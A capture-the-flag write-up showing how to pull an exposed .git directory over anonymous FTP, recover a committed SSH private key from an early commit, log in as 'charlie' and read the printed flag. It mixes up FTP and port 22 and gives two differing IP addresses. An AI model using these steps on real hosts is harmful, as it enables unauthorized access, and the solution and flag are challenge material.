Time Traveler's Git (Part 1)
Description
You are a time traveler who stumbled upon an ancient Git repository containing valuable data from a long-gone era. However, the repository seems to have some hidden secrets and potential vulnerabilities in its history. Charlie is your friend.
143.110.189.89
Solution
We are given an IP address.
Running a quick nmap scan on the IP address, we find that port 22 is open.
We can login to the ftp server using
anonymous
as the username.
Download everything from .git and login.html using ftp
I downloaded everything manually like a noob.
Alternative way:
wget -r --no-passive --no-parent --user=anonymous --password=anonymous ftp://143.110.180.89
Check the logs
git log
Check the first commit:
git checkout 5a496dbebbce1585698634e5348703b74e7ac781
We find an SSH key
Copy it to a file and change the permissions: (MAKE SURE THE FORMAT IS RIGHT!!!)
chmod 600 id_rsa
Login to the server using the ssh key:
ssh -i id_rsa charlie@0.cloud.chals.io -p <port-no>
List the files:
FLAG:
KPMG_CTF{ed0d1d2926547a24488d29fb5c3941be}
Last updated